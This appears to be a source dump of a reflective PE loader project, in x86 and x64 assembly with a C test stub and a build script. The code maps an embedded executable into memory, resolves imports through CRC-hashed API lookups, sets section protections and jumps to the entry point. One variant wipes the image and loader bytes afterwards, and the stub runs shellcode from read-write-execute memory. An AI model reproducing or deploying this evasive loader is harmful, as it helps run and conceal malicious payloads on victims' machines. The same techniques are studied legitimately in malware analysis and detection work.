30 | loc_401f5f: call eax ; allocate
31 | loc_401f65: sub esp,0x18 ; the stdcall callee popped its 6 arguments; restore the frame
32 | loc_401f68: mov edx,eax
33 | loc_401f6a: mov eax,0x0
34 | loc_401f6f: test edx,edx
35 | loc_401f71: js loc_401fcf ; negative NTSTATUS → return 0
36 | loc_401f73: mov eax,DWORD [edi+0x54] ; OptionalHeader.SizeOfHeaders
37 | loc_401f76: mov DWORD [esp+0x8],eax ; memcpy(new base, raw image, SizeOfHeaders)
38 | loc_401f7a: mov DWORD [esp+0x4],ebp
39 | loc_401f7e: mov eax,DWORD [esp+0x2c]
40 | loc_401f82: mov DWORD [esp],eax
41 | loc_401f85: call memcpy
42 | loc_401f8a: movzx eax,WORD [edi+0x14] ; FileHeader.SizeOfOptionalHeader
43 | loc_401f8e: lea ebx,[edi+eax*1+0x18] ; ebx = first IMAGE_SECTION_HEADER
44 | loc_401f92: cmp WORD [edi+0x6],0x0 ; FileHeader.NumberOfSections
45 | loc_401f97: je loc_401fcb ; no sections → done
46 | loc_401f99: mov esi,0x0 ; esi = section index
47 | loc_401f9e: mov eax,DWORD [ebx+0xc] ; memcpy(base + VirtualAddress, raw + PointerToRawData, SizeOfRawData)
48 | loc_401fa1: add eax,DWORD [esp+0x2c]
49 | loc_401fa5: mov edx,ebp
50 | loc_401fa7: add edx,DWORD [ebx+0x14] ; PointerToRawData
51 | loc_401faa: mov ecx,DWORD [ebx+0x10] ; SizeOfRawData (0 for uninitialised-data sections → nothing copied)
52 | loc_401fad: mov DWORD [esp+0x8],ecx
53 | loc_401fb1: mov DWORD [esp+0x4],edx
54 | loc_401fb5: mov DWORD [esp],eax
55 | loc_401fb8: call memcpy
56 | loc_401fbd: add esi,0x1
57 | loc_401fc0: add ebx,0x28 ; sizeof(IMAGE_SECTION_HEADER)
58 | loc_401fc3: movzx eax,WORD [edi+0x6]
59 | loc_401fc7: cmp eax,esi
60 | loc_401fc9: jg loc_401f9e
61 | loc_401fcb: mov eax,DWORD [esp+0x2c] ; return the new base
62 | loc_401fcf: add esp,0x3c
63 | loc_401fd2: pop ebx
64 | loc_401fd3: pop esi
65 | loc_401fd4: pop edi
66 | loc_401fd5: pop ebp
67 | loc_401fd6: ret
68 |
--------------------------------------------------------------------------------
/loader/loader-x86/inc/memcpy.asm:
--------------------------------------------------------------------------------
1 | [BITS 32]
2 |
3 | ; memcpy(&dst, &src, size) — cdecl: [ebp+8] = &dst, [ebp+12] = &src, [ebp+16] = size. Forward byte copy; assumes DF is clear (nothing here executes cld) and does not handle overlapping ranges.
4 | memcpy:
5 | push ebp
6 | mov ebp, esp
7 | push esi
8 | push edi
9 | push ecx ; ECX is preserved across the copy
10 | mov edi,[ebp+8] ; destination
11 | mov esi,[ebp+12] ; source
12 | mov ecx,[ebp+16] ; byte count
13 | copy_byte:
14 | rep movsb ; Copy ECX bytes from [ESI] to [EDI]
15 | pop ecx
16 | pop edi
17 | pop esi
18 | mov esp,ebp
19 | pop ebp
20 | ret ; Return (caller cleans the arguments)
--------------------------------------------------------------------------------
/loader/loader-x86/inc/protect_sections.asm:
--------------------------------------------------------------------------------
1 | [BITS 32]
2 | ; protect_sections(esp+4 = mapped image base) -> EAX = 1 on success, 0 as soon as one protection call fails. For each section with non-zero Characteristics, maps IMAGE_SCN_MEM_EXECUTE / READ / WRITE (0x20000000 / 0x40000000 / 0x80000000) to a PAGE_* constant in EDX and applies it with the API api_call resolves for hash 0x6EDE4D41 (argument layout matches NtProtectVirtualMemory — confirm against crc32_api). The jump-heavy middle is a compiler-generated decision tree using [esp+0x2f] (READ flag) and EDI (WRITE/EXECUTE flag); the comments name the values it produces.
3 | protect_sections:
4 | loc_4057e8: push ebp
5 | loc_4057e9: push edi
6 | loc_4057ea: push esi
7 | loc_4057eb: push ebx
8 | loc_4057ec: sub esp,0x4c ; outgoing arguments at +0..+0x10, locals: +0x28 section ptr, +0x2f flag, +0x34 RegionSize, +0x38 OldProtect, +0x3c BaseAddress
9 | loc_4057ef: mov ebp,DWORD [esp+0x60] ; ebp = image base (also re-read from the argument later)
10 | loc_4057f3: mov edi,ebp
11 | loc_4057f5: add edi,DWORD [ebp+0x3c] ; edi = IMAGE_NT_HEADERS (e_lfanew)
12 | loc_4057f8: movzx eax,WORD [edi+0x14] ; FileHeader.SizeOfOptionalHeader
13 | loc_4057fc: lea ebx,[edi+eax*1+0x18] ; ebx = first IMAGE_SECTION_HEADER
14 | loc_405800: mov DWORD [esp+0x3c],0x0
15 | loc_405808: cmp WORD [edi+0x6],0x0 ; FileHeader.NumberOfSections
16 | loc_40580d: je loc_405840 ; no sections → success
17 | loc_40580f: mov esi,0x0 ; esi = section index
18 | loc_405814: mov ebp,edi ; from here on ebp = NT headers
19 | loc_405816: jmp loc_40591e ; enter the loop at its head
20 | loc_40581b: mov BYTE [esp+0x2f],0x1 ; READ+WRITE+EXECUTE
21 | loc_405820: jmp loc_405863
22 | loc_405822: mov edx,0x20 ; READ+EXECUTE → PAGE_EXECUTE_READ
23 | loc_405827: jmp loc_4058ba
24 | loc_40582c: mov eax,0x0 ; protection call failed → return 0
25 | loc_405831: jmp loc_405838
26 | loc_405833: mov eax,0x1 ; every section processed → return 1
27 | loc_405838: add esp,0x4c ; common epilogue
28 | loc_40583b: pop ebx
29 | loc_40583c: pop esi
30 | loc_40583d: pop edi
31 | loc_40583e: pop ebp
32 | loc_40583f: ret
33 | loc_405840: mov eax,0x1 ; no sections → return 1
34 | loc_405845: jmp loc_405838
35 | loc_405847: mov edi,eax ; READ not set: edi = WRITE bit
36 | loc_405849: shr edi,0x1f
37 | loc_40584c: mov BYTE [esp+0x2f],0x0
38 | loc_405851: test eax,0x20000000 ; EXECUTE?
39 | loc_405856: je loc_405892
40 | loc_405858: mov edx,0x10 ; PAGE_EXECUTE (may be refined below)
41 | loc_40585d: mov ecx,edi
42 | loc_40585f: test cl,cl
43 | loc_405861: je loc_405897
44 | loc_405863: and eax,0x60000000 ; EXECUTE+WRITE: EDX = 0x20 (PAGE_EXECUTE_READ) when READ is also set, else 0x80 (PAGE_EXECUTE_WRITECOPY)
45 | loc_405868: mov edi,0x1
46 | loc_40586d: cmp eax,0x60000000
47 | loc_405872: mov edx,0x20
48 | loc_405877: mov eax,0x80
49 | loc_40587c: cmovne edx,eax
50 | loc_40587f: jmp loc_4058a7
51 | loc_405881: test eax,0x20000000 ; READ+WRITE: EXECUTE too?
52 | loc_405886: jne loc_40581b
53 | loc_405888: mov BYTE [esp+0x2f],0x1
54 | loc_40588d: mov edx,0x4 ; PAGE_READWRITE
55 | loc_405892: mov edi,0x0
56 | loc_405897: and eax,0x60000000
57 | loc_40589c: cmp eax,0x60000000 ; READ and EXECUTE both set?
58 | loc_4058a1: je loc_405822
59 | loc_4058a7: cmp BYTE [esp+0x2f],0x0 ; READ flag set and EDI = 1 (from loc_405863) → READ+WRITE+EXECUTE → 0x40 (PAGE_EXECUTE_READWRITE)
60 | loc_4058ac: je loc_4058ba
61 | loc_4058ae: mov eax,edi
62 | loc_4058b0: test al,al
63 | loc_4058b2: mov eax,0x40
64 | loc_4058b7: cmovne edx,eax
65 | loc_4058ba: mov eax,DWORD [esp+0x60] ; apply EDX to [base + VirtualAddress, + SizeOfRawData)
66 | loc_4058be: mov ecx,DWORD [esp+0x28] ; current section header
67 | loc_4058c2: add eax,DWORD [ecx+0xc] ; VirtualAddress
68 | loc_4058c5: mov DWORD [esp+0x3c],eax ; BaseAddress
69 | loc_4058c9: mov eax,DWORD [ecx+0x10] ; SizeOfRawData, not VirtualSize (+0x8): the uninitialised tail keeps the allocation's original protection
70 | loc_4058cc: mov DWORD [esp+0x34],eax ; RegionSize
71 | loc_4058d0: mov DWORD [esp+0x38],0x0 ; OldProtect
72 | loc_4058d8: lea eax,[esp+0x38]
73 | loc_4058dc: mov DWORD [esp+0x10],eax ; arg5: &OldProtect
74 | loc_4058e0: mov DWORD [esp+0xc],edx ; arg4: new protection
75 | loc_4058e4: lea eax,[esp+0x34]
76 | loc_4058e8: mov DWORD [esp+0x8],eax ; arg3: &RegionSize
77 | loc_4058ec: lea eax,[esp+0x3c]
78 | loc_4058f0: mov DWORD [esp+0x4],eax ; arg2: &BaseAddress
79 | loc_4058f4: mov DWORD [esp],0xffffffff ; arg1: current-process pseudo handle (-1)
80 | loc_555555: push 0x6EDE4D41 ; hash consumed by api_call (stack argument in the 32-bit build)
81 | loc_666666: call api_call ; EAX = resolved function pointer
82 | loc_zzzzzz: add esp,4 ; drop the hash
83 | loc_4058fb: call eax ; change the protection
84 | loc_405901: sub esp,0x14 ; the stdcall callee popped its 5 arguments; restore the frame
85 | loc_405904: test eax,eax
86 | loc_405906: js loc_40582c ; negative NTSTATUS → fail
87 | loc_40590c: add esi,0x1 ; advance to the next section
88 | loc_40590f: add ebx,0x28 ; sizeof(IMAGE_SECTION_HEADER)
89 | loc_405912: movzx eax,WORD [ebp+0x6] ; NumberOfSections
90 | loc_405916: cmp eax,esi
91 | loc_405918: jle loc_405833 ; past the last section → success
92 | loc_40591e: mov DWORD [esp+0x28],ebx ; loop head: classify the section at ebx
93 | loc_405922: mov eax,DWORD [ebx+0x24] ; Characteristics
94 | loc_405925: test eax,eax
95 | loc_405927: je loc_40590c ; nothing set → leave this section alone
96 | loc_405929: cdq ; default: 0x8 (PAGE_WRITECOPY) if WRITE, else 0x40 (PAGE_EXECUTE_READWRITE); a section with none of the three MEM bits keeps this 0x40
97 | loc_40592a: and edx,0xffffffc8
98 | loc_40592d: add edx,0x40
99 | loc_405930: test eax,0x40000000 ; IMAGE_SCN_MEM_READ?
100 | loc_405935: je loc_405847
101 | loc_40593b: test eax,eax ; IMAGE_SCN_MEM_WRITE (bit 31)?
102 | loc_40593d: js loc_405881
103 | loc_405943: mov edi,0x0 ; READ only (EXECUTE still to be checked at loc_405851)
104 | loc_405948: mov BYTE [esp+0x2f],0x1
105 | loc_40594d: mov edx,0x2 ; PAGE_READONLY
106 | loc_405952: jmp loc_405851
107 |
--------------------------------------------------------------------------------
/loader/loader-x86/inc/relocate_image.asm:
--------------------------------------------------------------------------------
1 | [BITS 32]
2 |
3 |
4 | relocate_image:
5 | loc_403055: push ebp
6 | loc_403056: push edi
7 | loc_403057: push esi
8 | loc_403058: push ebx
9 | loc_403059: mov ebp,DWORD [esp+0x14]
10 | loc_40305d: mov ebx,ebp
11 | loc_40305f: add ebx,DWORD [ebp+0x3c]
12 | loc_403062: mov edx,DWORD [ebx+0xa0]
13 | loc_403068: mov eax,0x0
14 | loc_40306d: test edx,edx
15 | loc_40306f: je loc_4030d3
16 | loc_403071: add edx,ebp
17 | loc_403073: mov esi,ebp
18 | loc_403075: sub esi,DWORD [ebx+0x34]
19 | loc_403078: cmp DWORD [edx],0x0
20 | loc_40307b: jne loc_4030be
21 | loc_40307d: mov eax,0x1
22 | loc_403082: jmp loc_4030d3
23 | loc_403084: movzx ecx,WORD [eax]
24 | loc_403087: and ecx,0xfff
25 | loc_40308d: add ecx,DWORD [edx]
26 | loc_40308f: add DWORD [ebp+ecx*1+0x0],esi
27 | loc_403093: add eax,0x2
28 | loc_403096: mov ecx,edx
29 | loc_403098: add ecx,DWORD [edx+0x4]
30 | loc_40309b: cmp eax,ecx
31 | loc_40309d: je loc_4030b7
32 | loc_40309f: movzx ecx,BYTE [eax+0x1]
33 | loc_4030a3: mov edi,ecx
34 | loc_4030a5: and edi,0xfffffff0
35 | loc_4030a8: mov ebx,edi
36 | loc_4030aa: cmp bl,0x30
37 | loc_4030ad: je loc_403084
38 | loc_4030af: cmp cl,0xf
39 | loc_4030b2: jbe loc_403093
40 | loc_4030b4: int3
41 | loc_4030b5: jmp loc_403093
42 | loc_4030b7: mov edx,eax
43 | loc_4030b9: cmp DWORD [edx],0x0
44 | loc_4030bc: je loc_4030ce
45 | loc_4030be: lea eax,[edx+0x8]
46 | loc_4030c1: mov ecx,edx
47 | loc_4030c3: add ecx,DWORD [edx+0x4]
48 | loc_4030c6: cmp eax,ecx
49 | loc_4030c8: jne loc_40309f
50 | loc_4030ca: mov edx,ecx
51 | loc_4030cc: jmp loc_4030b9
52 | loc_4030ce: mov eax,0x1
53 | loc_4030d3: pop ebx
54 | loc_4030d4: pop esi
55 | loc_4030d5: pop edi
56 | loc_4030d6: pop ebp
57 | loc_4030d7: ret
58 |
--------------------------------------------------------------------------------
/loader/loader-x86/inc/resolve_imports.asm:
--------------------------------------------------------------------------------
1 | [BITS 32]
2 |
3 |
4 | resolve_imports:
5 | loc_4042ff: push ebp
6 | loc_404300: push edi
7 | loc_404301: push esi
8 | loc_404302: push ebx
9 | loc_404303: sub esp,0x2c
10 | loc_404306: mov ebp,DWORD [esp+0x40]
11 | loc_40430a: mov eax,DWORD [ebp+0x3c]
12 | loc_40430d: mov edx,DWORD [ebp+eax*1+0x80]
13 | loc_404314: mov eax,0x0
14 | loc_404319: test edx,edx
15 | loc_40431b: je loc_4043d5
16 | loc_404321: lea eax,[ebp+edx*1+0x0]
17 | loc_404325: mov DWORD [esp+0x1c],eax
18 | loc_404329: mov eax,DWORD [eax+0xc]
19 | loc_40432c: test eax,eax
20 | loc_40432e: jne loc_4043a4
21 | loc_404330: mov eax,0x1
22 | loc_404335: jmp loc_4043d5
23 | loc_40433a: mov DWORD [esp+0x8],eax
24 | loc_40433e: mov DWORD [esp+0x4],0x0
25 | loc_404346: mov DWORD [esp],edi
26 | loc_404349: call get_proc_by_crc
27 | loc_40434e: test eax,eax
28 | loc_404350: je loc_404354
29 | loc_404352: mov DWORD [esi],eax
30 | loc_404354: add ebx,0x4
31 | loc_404357: add esi,0x4
32 | loc_40435a: mov eax,DWORD [ebx]
33 | loc_40435c: test eax,eax
34 | loc_40435e: je loc_404394
35 | loc_404360: test eax,eax
36 | loc_404362: js loc_40433a
37 | loc_404364: mov DWORD [esp+0x4],0x0
38 | loc_40436c: lea eax,[ebp+eax*1+0x2]
39 | loc_404370: mov DWORD [esp],eax
40 | loc_404373: call calc_crc
41 | loc_404378: mov DWORD [esp+0x8],0xffffffff
42 | loc_404380: mov DWORD [esp+0x4],eax
43 | loc_404384: mov DWORD [esp],edi
44 | loc_404387: call get_proc_by_crc
45 | loc_40438c: test eax,eax
46 | loc_40438e: je loc_404354
47 | loc_404390: mov DWORD [esi],eax
48 | loc_404392: jmp loc_404354
49 | loc_404394: add DWORD [esp+0x1c],0x14
50 | loc_404399: mov eax,DWORD [esp+0x1c]
51 | loc_40439d: mov eax,DWORD [eax+0xc]
52 | loc_4043a0: test eax,eax
53 | loc_4043a2: je loc_4043c9
54 | loc_4043a4: add eax,ebp
55 | loc_4043a6: mov DWORD [esp],eax
56 | loc_4043a9: call load_module
57 | loc_4043ae: mov edi,eax
58 | loc_4043b0: test eax,eax
59 | loc_4043b2: je loc_4043d0
60 | loc_4043b4: mov eax,DWORD [esp+0x1c]
61 | loc_4043b8: mov ebx,ebp
62 | loc_4043ba: add ebx,DWORD [eax]
63 | loc_4043bc: mov esi,ebp
64 | loc_4043be: add esi,DWORD [eax+0x10]
65 | loc_4043c1: mov eax,DWORD [ebx]
66 | loc_4043c3: test eax,eax
67 | loc_4043c5: jne loc_404360
68 | loc_4043c7: jmp loc_404394
69 | loc_4043c9: mov eax,0x1
70 | loc_4043ce: jmp loc_4043d5
71 | loc_4043d0: mov eax,0x0
72 | loc_4043d5: add esp,0x2c
73 | loc_4043d8: pop ebx
74 | loc_4043d9: pop esi
75 | loc_4043da: pop edi
76 | loc_4043db: pop ebp
77 | loc_4043dc: ret
78 |
--------------------------------------------------------------------------------
/loader/loader-x86/inc/run_tls_callbacks.asm:
--------------------------------------------------------------------------------
1 | [BITS 32]
2 |
3 |
4 | run_tls_callbacks:
5 | loc_406cdf: push esi
6 | loc_406ce0: push ebx
7 | loc_406ce1: sub esp,0x14
8 | loc_406ce4: mov esi,DWORD [esp+0x20]
9 | loc_406ce8: mov eax,DWORD [esi+0x3c]
10 | loc_406ceb: mov edx,DWORD [esi+eax*1+0xc0]
11 | loc_406cf2: mov eax,0x0
12 | loc_406cf7: test edx,edx
13 | loc_406cf9: je loc_406d08
14 | loc_406cfb: mov ebx,DWORD [esi+edx*1+0xc]
15 | loc_406cff: mov eax,0x1
16 | loc_406d04: test ebx,ebx
17 | loc_406d06: jne loc_406d29
18 | loc_406d08: add esp,0x14
19 | loc_406d0b: pop ebx
20 | loc_406d0c: pop esi
21 | loc_406d0d: ret
22 | loc_406d0e: mov DWORD [esp+0x8],0x0
23 | loc_406d16: mov DWORD [esp+0x4],0x1
24 | loc_406d1e: mov DWORD [esp],esi
25 | loc_406d21: call eax
26 | loc_406d23: sub esp,0xc
27 | loc_406d26: add ebx,0x4
28 | loc_406d29: mov eax,DWORD [ebx]
29 | loc_406d2b: test eax,eax
30 | loc_406d2d: jne loc_406d0e
31 | loc_406d2f: mov eax,0x1
32 | loc_406d34: jmp loc_406d08
33 |
--------------------------------------------------------------------------------
/loader/loader-x86/loader-x86-lite.asm:
--------------------------------------------------------------------------------
1 | ;#===========================================#
2 | ;# x86 Reflective Loader #
3 | ;# Author: Ege Balcı #
4 | ;# Version: 3.0 #
5 | ;#===========================================#
6 |
7 | [BITS 32]
8 |
9 | %define e_lfanew 0x3C
10 | %define _AddressOfEntry 0x28
11 | loader_size equ pe_start-loader
12 |
13 |
14 | call loader ; Start by calling over the PE image
15 | loader:
16 | pop esi ; Get current address into esi
17 | add esi, loader_size ; Add the loader size
18 | push ebp ; Save EBP
19 | mov ebp,esp ; Create a stack frame
20 | push esi ; Push the PE address as first parameter
21 | call map_image ; Perform PE image mapping
22 | pop esi ; Pop out the PE address
23 | push eax ; Push new image baes to stack
24 | call relocate_image ; Perform image relocation
25 | call resolve_imports ; Resolve image imports & create IAT table
26 | call protect_sections ; Apply proper section memory protections
27 | call run_tls_callbacks ; Try to execute TLS callbacks. May fail... ¯\_(ツ)_/¯
28 | pop edi ; Get the new image base value into edi
29 | mov eax,[edi+e_lfanew] ; Get the file header offset
30 | mov eax,[edi+eax+_AddressOfEntry] ; Get the AddressOfEntry into eax
31 | add eax,edi ; Add the AOE onto new image base
32 | cld ; Clear direction flags
33 | mov esp, ebp ; Restore stack frame
34 | pop ebp ; Restore RBP
35 | jmp eax ; Jmp to the PE->AOE
36 | ; ------------------------ FUNCTIONS ------------------------------------
37 | %include "./inc/memcpy.asm"
38 | %include "./inc/calc_crc.asm"
39 | %include "./inc/map_image.asm"
40 | %include "./inc/load_module.asm"
41 | %include "./inc/relocate_image.asm"
42 | %include "./inc/resolve_imports.asm"
43 | %include "./inc/get_proc_by_crc.asm"
44 | %include "./inc/get_module_by_crc.asm"
45 | %include "./inc/protect_sections.asm"
46 | %include "./inc/run_tls_callbacks.asm"
47 | %include "../crc32_api/crc32_api_x86.asm"
48 | ;------------------------ FUNCTIONS -------------------------------------
49 | pe_start:
--------------------------------------------------------------------------------
/loader/loader-x86/loader-x86.asm:
--------------------------------------------------------------------------------
1 | ;#===========================================#
2 | ;# x86 Reflective Loader #
3 | ;# Author: Ege Balcı #
4 | ;# Version: 3.0 #
5 | ;#===========================================#
6 |
7 | [BITS 32]
8 |
9 | %define e_lfanew 0x3C
10 | %define _AddressOfEntry 0x28
11 |
12 | call start ; Start by calling over the PE image
13 | incbin "putty.exe" ; PE image
14 | start:
15 | pop esi ; Get the PE address into esi
16 | push ebp ; Save EBP
17 | mov ebp,esp ; Create a stack frame
18 | push esi ; Push the PE address as first parameter
19 | call map_image ; Perform PE image mapping
20 | pop esi ; Pop out the PE address
21 | push eax ; Push new image baes to stack
22 | call relocate_image ; Perform image relocation
23 | call resolve_imports ; Resolve image imports & create IAT table
24 | call protect_sections ; Apply proper section memory protections
25 | call run_tls_callbacks ; Try to execute TLS callbacks. May fail... ¯\_(ツ)_/¯
26 | pop edi ; Get the new image base value into edi
27 | mov eax,[edi+e_lfanew] ; Get the file header offset
28 | mov eax,[edi+eax+_AddressOfEntry] ; Get the AddressOfEntry into eax
29 | add eax,edi ; Add the AOE onto new image base
30 | jmp wipe ; Wipe memory artifacts
31 | ; ------------------------ FUNCTIONS ------------------------------------
32 | %include "./inc/memcpy.asm"
33 | %include "./inc/calc_crc.asm"
34 | %include "./inc/map_image.asm"
35 | %include "./inc/load_module.asm"
36 | %include "./inc/relocate_image.asm"
37 | %include "./inc/resolve_imports.asm"
38 | %include "./inc/get_proc_by_crc.asm"
39 | %include "./inc/get_module_by_crc.asm"
40 | %include "./inc/protect_sections.asm"
41 | %include "./inc/run_tls_callbacks.asm"
42 | %include "../crc32_api/crc32_api_x86.asm"
43 | ;------------------------ FUNCTIONS -------------------------------------
44 | wipe:
45 | wipe_len_delta equ wipe_end-wipe
46 | call $+5 ; Get current EIP to stack
47 | pop ecx ; Pop currect EIP to RCX
48 | sub ecx,esi ; Calculate the size of the PE file
49 | add ecx,wipe_len_delta ; Add the size of wipe code
50 | mov edi,esi ; Move the PE address to RDI
51 | sub edi,0x5 ; Go back 5 bytes for wiping the initial call as well
52 | wipe_end:
53 | rep stosb ; Store AL into RDI and decrement RDI until RCX = 0
54 | ; -------------------- SWITCH TO PE ----------------------------
55 | cld ; Clear direction flags
56 | mov esp, ebp ; Restore stack frame
57 | pop ebp ; Restore RBP
58 | jmp eax ; Jmp to the PE->AOE
--------------------------------------------------------------------------------
/loader/loader-x86/stub.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include "shellcode.h"
3 |
4 | int main(int argc, char const *argv[])
5 | {
6 | char* BUFFER = (char*)VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
7 | memcpy(BUFFER, shellcode, sizeof(shellcode));
8 | (*(void(*)())BUFFER)();
9 | return 0;
10 | }
11 |
--------------------------------------------------------------------------------
/loader/syscall-loader-x64/build.sh:
--------------------------------------------------------------------------------
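1 | #!/bin/bash
2 | # Build helper for the x64 syscall loader: assembles the shellcode, wraps it
3 | # in a C header and compiles the test stub. Every failing step aborts the
4 | # script through print_fatal, so later steps never run against a stale or
5 | # missing artifact. All paths are relative to this directory, so enter it first.
6 | cd "$(dirname "$0")" || exit 1
7 |
8 | ## ANSI Colors (FG & BG)
9 | RED="$(printf '\033[31m')" GREEN="$(printf '\033[32m')" YELLOW="$(printf '\033[33m')" BLUE="$(printf '\033[34m')"
10 | MAGENTA="$(printf '\033[35m')" CYAN="$(printf '\033[36m')" WHITE="$(printf '\033[37m')" BLACK="$(printf '\033[30m')"
11 | REDBG="$(printf '\033[41m')" GREENBG="$(printf '\033[42m')" YELLOWBG="$(printf '\033[43m')" BLUEBG="$(printf '\033[44m')"
12 | MAGENTABG="$(printf '\033[45m')" CYANBG="$(printf '\033[46m')" WHITEBG="$(printf '\033[47m')" BLACKBG="$(printf '\033[40m')"
13 | RESET="$(printf '\e[0m')"
14 |
15 | # print_warning MSG -- yellow "[!]" prefix, non-fatal.
16 | print_warning() {
17 | echo "${YELLOW}[!] ${RESET}${1}"
18 | }
19 | # print_error MSG -- red "[-]" prefix, non-fatal.
20 | print_error() {
21 | echo "${RED}[-] ${RESET}${1}"
22 | }
23 | # print_fatal MSG -- report on stderr and stop the script with a non-zero
24 | # status. (The previous `kill -10 $$` sent SIGUSR1 to the shell, which only
25 | # terminates it when the signal is not trapped or ignored; `exit 1` is
26 | # unconditional and gives callers a usable exit code.)
27 | print_fatal() {
28 | echo -e "${RED}[!] ${1}\n${RESET}" >&2
29 | exit 1
30 | }
31 | # print_good MSG -- green "[+]" prefix.
32 | print_good() {
33 | echo "${GREEN}[+] ${RESET}${1}"
34 | }
35 | # print_status MSG -- yellow "[*]" prefix.
36 | print_status() {
37 | echo "${YELLOW}[*] ${RESET}${1}"
38 | }
39 |
40 | nasm -f bin syscall-loader-x64.asm -o shellcode || print_fatal "nasm failed!"
41 | print_status "Payload Size: $(wc -c < shellcode)"
42 | # The header is what stub.c includes; a missing xxd used to surface only as a
43 | # confusing compiler error further down.
44 | xxd -i shellcode shellcode.h || print_fatal "xxd failed!"
45 |
46 | x86_64-w64-mingw32-gcc stub.c -o test.exe || print_fatal "Compilation failed!"
47 | # NOTE(review): /tmp is shared and world-writable; a fixed file name there can
48 | # be replaced by any other local user between the copy and its use. Keep the
49 | # copy here for compatibility, but prefer a private build directory.
50 | cp test.exe /tmp/ || print_warning "Could not copy test.exe to /tmp/"
51 | rm -f shellcode shellcode.h
52 | print_good "Build done!"
53 |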
--------------------------------------------------------------------------------
/loader/syscall-loader-x64/inc/calc_crc.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 | ; calc_crc(RCX = buffer, DX = length) -> EAX. Folds the bytes through the hardware crc32 instruction (CRC-32C polynomial, needs SSE4.2) starting from 0.
3 | ; DX == 0 selects the NUL-terminated-string path; an empty string yields 0. No final XOR is applied. Clobbers RDX, R8 (and RCX on the string path).
4 | calc_crc:
5 | test dx,dx ; explicit length supplied?
6 | je loc_1400039c9 ; no: hash up to the terminating NUL instead
7 | mov r8,rcx ; r8 = running byte pointer
8 | movzx edx,dx ; zero-extend the 16-bit length
9 | lea eax,[rdx-0x1]
10 | lea rdx,[rcx+rax*1+0x1] ; rdx = one past the last byte
11 | mov eax,0x0 ; seed 0 (not the 0xFFFFFFFF of standard CRC-32C)
12 | loc_1400039b8:
13 | crc32 eax,BYTE [r8] ; fold one byte
14 | add r8,0x1
15 | cmp r8,rdx
16 | jne loc_1400039b8
17 | jmp loc_1400039ea
18 | loc_1400039c9:
19 | movzx edx,BYTE [rcx] ; first character
20 | test dl,dl
21 | je loc_1400039eb ; empty string -> 0
22 | add rcx,0x1
23 | mov eax,0x0 ; seed 0, as above
24 | loc_1400039d9:
25 | crc32 eax,dl ; fold the character fetched on the previous iteration
26 | add rcx,0x1
27 | movzx edx,BYTE [rcx-0x1] ; next character (rcx is kept one ahead)
28 | test dl,dl
29 | jne loc_1400039d9
30 | loc_1400039ea:
31 | ret
32 | loc_1400039eb:
33 | mov eax,0x0
34 | jmp loc_1400039ea
--------------------------------------------------------------------------------
/loader/syscall-loader-x64/inc/get_module_by_crc.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 |
3 |
4 | get_module_by_crc:
5 | push rdi
6 | push rsi
7 | push rbx
8 | sub rsp,0x20
9 | mov esi,ecx
10 | mov rax,QWORD gs:0x60
11 | mov rax,QWORD [rax+0x18]
12 | lea rdi,[rax+0x20]
13 | mov rbx,QWORD [rax+0x20]
14 | cmp rdi,rbx
15 | je loc_140102e89
16 | loc_140102e5d:
17 | movzx edx,WORD [rbx+0x48]
18 | mov rcx,QWORD [rbx+0x50]
19 | call calc_crc
20 | cmp eax,esi
21 | je loc_140102e7d
22 | mov rbx,QWORD [rbx]
23 | cmp rdi,rbx
24 | jne loc_140102e5d
25 | mov eax,0x0
26 | jmp loc_140102e81
27 | loc_140102e7d:
28 | mov rax,QWORD [rbx+0x20]
29 | loc_140102e81:
30 | add rsp,0x20
31 | pop rbx
32 | pop rsi
33 | pop rdi
34 | ret
35 | loc_140102e89:
36 | mov eax,0x0
37 | jmp loc_140102e81
38 |
--------------------------------------------------------------------------------
/loader/syscall-loader-x64/inc/get_proc_by_crc.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 |
3 |
4 | get_proc_by_crc:
5 | push r15
6 | push r14
7 | push r13
8 | push r12
9 | push rbp
10 | push rdi
11 | push rsi
12 | push rbx
13 | sub rsp,0x258
14 | mov rbx,rcx
15 | mov r13d,edx
16 | mov ebp,r8d
17 | movsxd rax,DWORD [rcx+0x3c]
18 | add rax,rcx
19 | mov esi,DWORD [rax+0x88]
20 | add rsi,rcx
21 | mov eax,DWORD [rax+0x8c]
22 | mov DWORD [rsp+0x2c],eax
23 | mov r12d,DWORD [rsi+0x20]
24 | mov r14d,DWORD [rsi+0x1c]
25 | mov r15d,DWORD [rsi+0x24]
26 | mov eax,DWORD [rsi+0x18]
27 | test eax,eax
28 | je loc_140003764
29 | mov eax,eax
30 | mov QWORD [rsp+0x20],rax
31 | mov edi,0x0
32 | add r12,rcx
33 | loc_1400035dc:
34 | mov ecx,DWORD [r12+rdi*4]
35 | add rcx,rbx
36 | mov edx,0x0
37 | call calc_crc
38 | cmp ebp,edi
39 | je loc_14000360b
40 | cmp eax,r13d
41 | je loc_14000360b
42 | add rdi,0x1
43 | cmp QWORD [rsp+0x20],rdi
44 | jne loc_1400035dc
45 | mov eax,0x0
46 | jmp loc_140003738
47 | loc_14000360b:
48 | lea rax,[rbx+rdi*2]
49 | movzx eax,WORD [rax+r15*1]
50 | lea rax,[rbx+rax*4]
51 | mov eax,DWORD [rax+r14*1]
52 | add rbx,rax
53 | cmp rbx,rsi
54 | jb loc_140003735
55 | mov eax,DWORD [rsp+0x2c]
56 | add rsi,rax
57 | cmp rbx,rsi
58 | jae loc_140003735
59 | mov QWORD [rsp+0x30],0x0
60 | mov QWORD [rsp+0x38],0x0
61 | lea rdi,[rsp+0x40]
62 | mov eax,0x0
63 | mov ecx,0x1e
64 | rep stosq
65 | mov DWORD [rdi],0x0
66 | mov QWORD [rsp+0x140],0x0
67 | mov QWORD [rsp+0x148],0x0
68 | lea rdi,[rsp+0x150]
69 | mov ecx,0x1e
70 | rep stosq
71 | mov DWORD [rdi],0x0
72 | cmp BYTE [rbx],0x2e
73 | je loc_14000374c
74 | mov eax,0x1
75 | loc_14000369e:
76 | mov r8,rax
77 | add rax,0x1
78 | cmp BYTE [rbx+rax*1-0x1],0x2e
79 | jne loc_14000369e
80 | mov esi,r8d
81 | loc_1400036af:
82 | lea rcx,[rsp+0x30]
83 | mov rdx,rbx
84 | call memcpy
85 | lea ecx,[rsi+0x1]
86 | movsxd rcx,ecx
87 | add rcx,rbx
88 | cmp BYTE [rcx],0x0
